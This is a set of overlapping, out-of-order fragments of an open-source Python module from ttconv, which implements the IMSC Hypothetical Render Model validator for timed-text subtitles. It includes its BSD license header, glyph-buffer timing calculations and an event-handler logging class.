"time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def error(self,",
"doc_index, is_last_isd_empty) avail_render_time = _IPD if doc_index == 0 else time_offset - last_offset",
": styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType",
"element in region.dfs_iterator(): # should body elements really be excluded? -> NO #",
"count: {stats.gcpy_count} | render count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear:",
"the `event_handler`. ''' hrm = HRM() last_offset = 0 is_last_isd_empty = True for",
"raise ValueError(\"Argument must be a string of length 1\") return _REN_G_CJK if 0x4E00",
"_GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not styles.LengthType.Units.rw:",
"in front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in",
"Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def error(self, msg:",
"not (stats.is_empty and is_last_isd_empty): last_offset = time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class _Glyph:",
"if ord(char) in GCPY_12 else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent)",
"_is_presented_region(region): continue self.isd_stats.is_empty = False nbg = 0 for element in region.dfs_iterator(): #",
"sequence of ISDs returned by `isd_iterator` conform to the IMSC HRM. `isd_iterator` returns",
"+= nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer: self.isd_stats.dur_t +=",
"caller. ''' @staticmethod def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats:",
"f\" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} | Background draw count:",
"10000 def _compute_ren_g(char: str): if len(char) != 1: raise ValueError(\"Argument must be a",
"not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\") if region_extent.height.units is not styles.LengthType.Units.rh:",
"gcpy_count: Number = 0 # Total number of glyphs copied gren_count: Number =",
"text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self): self.back_buffer:",
"int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def",
"doc_index, time_offset, avail_render_time, stats) if not (stats.is_empty and is_last_isd_empty): last_offset = time_offset is_last_isd_empty",
"styles.ColorType class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics = None",
"nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t( self, isd:",
"class _Glyph: char: str color : styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style:",
"WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING",
"None def next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ) -> ISDStatistics:",
"if font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value *",
"the caller of events that occur during processing. Typically overridden by the caller.",
"import logging import ttconv.isd import ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints import",
"element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow),",
"THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF",
"Redistribution and use in source and binary forms, with or without # modification,",
"dur_d: Number = 0 # HRM background drawing time nbg_total: Number = 0",
"self.isd_stats.is_empty = True draw_area = 0 if index_n == 0 or is_last_isd_empty else",
"`begin` value of the next ISD. Errors, warnings and info messages are signalled",
"from numbers import Number import logging import ttconv.isd import ttconv.style_properties as styles import",
"source and binary forms, with or without # modification, are permitted provided that",
"_REN_G_OTHER = 1.2 _NGBS = 1 _IPD = 1 @dataclass class ISDStatistics: dur:",
"font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer:",
"Fraction, available_time: Fraction, stats: ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\"",
"ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED",
"f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\"",
"FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE",
"as styles import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW =",
"if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t",
"SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT,",
") def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):",
"text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] =",
"next_isd( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats =",
"index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def _compute_dur_d(",
"= hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time = _IPD if doc_index == 0 else time_offset",
"on the `event_handler`. ''' hrm = HRM() last_offset = 0 is_last_isd_empty = True",
"_GCPY_OTHER = 3 _REN_G_CJK = 0.6 _REN_G_OTHER = 1.2 _NGBS = 1 _IPD",
"is_last_isd_empty = True for doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset < last_offset:",
"draw_area != 0 if isd is not None: for region in isd.iter_regions(): if",
"1: raise ValueError(\"Argument must be a string of length 1\") return _GCPY_BASE if",
"Copyright (c) 2021, Pearl TV LLC # # Redistribution and use in source",
"| render count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\" )",
"HRM ISD time dur_d: Number = 0 # HRM background drawing time nbg_total:",
"TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE",
"above copyright notice, this # list of conditions and the following disclaimer. #",
"STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY",
"time ngra_t: Number = 0 # Total Normalized Rendered Glyph Area gcpy_count: Number",
"# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render",
"last_offset = time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color :",
"if not _is_presented_region(region): continue self.isd_stats.is_empty = False nbg = 0 for element in",
"_index_n: int ): front_buffer = set() if isd is not None: for region",
"of conditions and the following disclaimer. # 2. Redistributions in binary form must",
"BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR",
"0 # Total number of glyphs rendered is_empty: bool = False # Does",
"self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats = ISDStatistics()",
"NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A",
"Number = 0 # Total number of glyphs rendered is_empty: bool = False",
"ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING",
"Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def error(self, msg: str, doc_index:",
"= self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int,",
"in self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1",
"time nbg_total: Number = 0 # Number of backgrounds drawn clear: bool =",
"ngra_t: Number = 0 # Total Normalized Rendered Glyph Area gcpy_count: Number =",
"Area gcpy_count: Number = 0 # Total number of glyphs copied gren_count: Number",
"= time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color : styles.ColorType",
"background drawing time nbg_total: Number = 0 # Number of backgrounds drawn clear:",
"typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area = 0 if",
"bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] != 0:",
"raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value * font_size.value / 10000 def _compute_ren_g(char:",
"is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] == 0: return",
"#!/usr/bin/env python # -*- coding: UTF-8 -*- # Copyright (c) 2021, Pearl TV",
"Typically overridden by the caller. ''' @staticmethod def _format_message(msg: str, doc_index: int, time_offset:",
"doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats) if not (stats.is_empty",
"really be excluded? -> NO # should transparent backgrounds really be counted? ->",
"now # should br really be included -> no if isinstance(element, ttconv.model.Br): continue",
"following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright",
"color : styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration:",
"is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value * font_size.value /",
"is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD],",
"region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility)",
"(time_offset, isd) in enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError(\"ISDs are not in",
"PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS;",
"is_last_isd_empty) avail_render_time = _IPD if doc_index == 0 else time_offset - last_offset if",
"instance whose active interval starts at `begin` seconds and ends immediately before the",
"msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset,",
"BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND # ANY EXPRESS OR",
"else 1 self.isd_stats.clear = draw_area != 0 if isd is not None: for",
"from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12",
"_IPD = 1 @dataclass class ISDStatistics: dur: Number = 0 # HRM ISD",
"avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats) if not (stats.is_empty and is_last_isd_empty):",
"= region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\")",
"if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if",
"= True for doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset < last_offset: raise",
"transparent backgrounds really be counted? -> NO # should span and br really",
"<= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if len(char) != 1: raise ValueError(\"Argument",
"raise ValueError(\"Argument must be a string of length 1\") return _GCPY_BASE if ord(char)",
"typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display) is",
"= 0 # HRM text drawing time ngra_t: Number = 0 # Total",
"doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time,",
"not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value * font_size.value / 10000",
"height units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See",
"time_offset, available_time, stats)) def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction,",
"available_time, stats)) def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats:",
"styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self):",
"if not isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga = _compute_nrga(element) for char",
"not isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga = _compute_nrga(element) for char in",
"Number of backgrounds drawn clear: bool = False # Whether the root container",
"if not _is_presented_region(region): continue for element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue",
"avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS",
"region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children():",
"self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True draw_area =",
"not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:",
"= region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if",
"if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index,",
"drawn clear: bool = False # Whether the root container had to be",
"OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS #",
"OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO",
"return region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if",
"CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,",
"if time_offset < last_offset: raise RuntimeError(\"ISDs are not in order of increasing offset\")",
"stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color : styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size:",
"if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] ==",
"PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY,",
"forms, with or without # modification, are permitted provided that the following conditions",
"ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s |",
"in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline),",
"above copyright notice, # this list of conditions and the following disclaimer in",
"char in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration),",
"TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR",
"not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] == 0: return False",
"# Whether the root container had to be cleared dur_t: Number = 0",
"not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3] != 0: nbg +=",
"not _is_presented_region(region): continue self.isd_stats.is_empty = False nbg = 0 for element in region.dfs_iterator():",
"conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce",
"SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF",
"backgrounds drawn clear: bool = False # Whether the root container had to",
"doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s",
"string of length 1\") return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else",
"is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color : styles.ColorType font_family: typing.Tuple[typing.Union[str,",
"region in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty = False nbg = 0",
"in source and binary forms, with or without # modification, are permitted provided",
"EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES",
"OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY",
"| Background draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\" ) def info(self, msg: str,",
"# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED.",
"0 # Total Normalized Rendered Glyph Area gcpy_count: Number = 0 # Total",
"if doc_index == 0 else time_offset - last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering",
"False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry",
"nbg += 1 draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d =",
"time exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index,",
"isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd,",
"the following disclaimer in the documentation # and/or other materials provided with the",
"really be included -> no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if",
"# # Redistribution and use in source and binary forms, with or without",
"= HRM() last_offset = 0 is_last_isd_empty = True for doc_index, (time_offset, isd) in",
"-*- coding: UTF-8 -*- # Copyright (c) 2021, Pearl TV LLC # #",
"''' @staticmethod def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):",
"+= nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer =",
"sequence of tuplets `(begin, ISD)`, where `ISD` is an ISD instance whose active",
"time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} | Background",
"if index_n == 0 or is_last_isd_empty else 1 self.isd_stats.clear = draw_area != 0",
"self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self,",
"ValueError(\"Argument must be a string of length 1\") return _REN_G_CJK if 0x4E00 <=",
"THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND",
"the above copyright notice, this # list of conditions and the following disclaimer.",
"= 0 is_last_isd_empty = True for doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset",
"time_offset < last_offset: raise RuntimeError(\"ISDs are not in order of increasing offset\") stats",
"at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\" f\"",
"not in order of increasing offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time =",
"NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE,",
"LLC # # Redistribution and use in source and binary forms, with or",
"time_offset - last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time,",
"isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga = _compute_nrga(element) for char in element.get_text():",
"elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count",
"self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count",
"!= 1: raise ValueError(\"Argument must be a string of length 1\") return _GCPY_BASE",
"IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN",
"== 0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is",
"styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline:",
"_NGBS = 1 _IPD = 1 @dataclass class ISDStatistics: dur: Number = 0",
"styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value / 10000",
"ISD time dur_d: Number = 0 # HRM background drawing time nbg_total: Number",
"OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR",
"LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #",
"= True draw_area = 0 if index_n == 0 or is_last_isd_empty else 1",
"if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return region_extent.width.value",
"+ self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool",
"if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor) if bg_color.ident",
"info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index,",
"* nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t( self,",
"is not None: for region in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty =",
"active interval starts at `begin` seconds and ends immediately before the `begin` value",
"value of the next ISD. Errors, warnings and info messages are signalled through",
"import ttconv.isd import ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER",
"ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self, msg: str, doc_index: int, time_offset:",
"# Total Normalized Rendered Glyph Area gcpy_count: Number = 0 # Total number",
"| HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count}",
"__init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics = None def next_isd( self, isd:",
"= front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not",
"Fraction, stats: ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time:",
"self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.ngra_t",
"RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value * font_size.value / 10000 def _compute_ren_g(char: str):",
"for region in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty = False nbg =",
"_region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t(",
"hrm = HRM() last_offset = 0 is_last_isd_empty = True for doc_index, (time_offset, isd)",
"= 1.2 _NGBS = 1 _IPD = 1 @dataclass class ISDStatistics: dur: Number",
"Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler:",
"and info messages are signalled through callbacks on the `event_handler`. ''' hrm =",
"self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType =",
"stats: ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s",
"def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg,",
"region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity)",
"ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE",
"region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return region_extent.width.value *",
"-> NO # should transparent backgrounds really be counted? -> NO # should",
"= 0 # Total number of glyphs rendered is_empty: bool = False #",
"are not in order of increasing offset\") stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time",
"# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE",
"doc_index, time_offset, available_time, stats)) def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time:",
"self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def",
"{float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} | Background draw",
"element.parent() nrga = _compute_nrga(element) for char in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color),",
"else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph)",
"GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)",
"string of length 1\") return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER def",
"events that occur during processing. Typically overridden by the caller. ''' @staticmethod def",
"CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL",
"text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer: self.isd_stats.dur_t += nrga /",
"| Clear: {stats.clear}\\n\" ) def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time:",
"styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] = set()",
"list of conditions and the following disclaimer. # 2. Redistributions in binary form",
"INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO,",
